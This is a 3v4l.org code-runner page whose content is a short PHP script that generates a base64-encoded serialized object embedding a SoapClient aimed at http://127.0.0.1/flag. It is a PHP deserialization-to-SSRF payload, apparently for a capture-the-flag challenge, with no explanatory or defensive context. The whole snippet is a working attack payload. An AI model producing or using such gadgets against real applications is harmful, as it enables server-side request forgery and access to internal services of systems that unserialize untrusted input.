3v4l.org

run code in 500+ PHP versions simultaneously
<?php class UserPref { public $theme; public $lang; } $soap = new SoapClient(null, [ 'location' => 'http://127.0.0.1/flag', 'uri' => 'http://example.com' ]); $obj = new UserPref(); $obj->theme = $soap; $obj->lang = 'test'; echo base64_encode(serialize($obj)); ?>

preferences:
54.13 ms | 758 KiB | 5 Q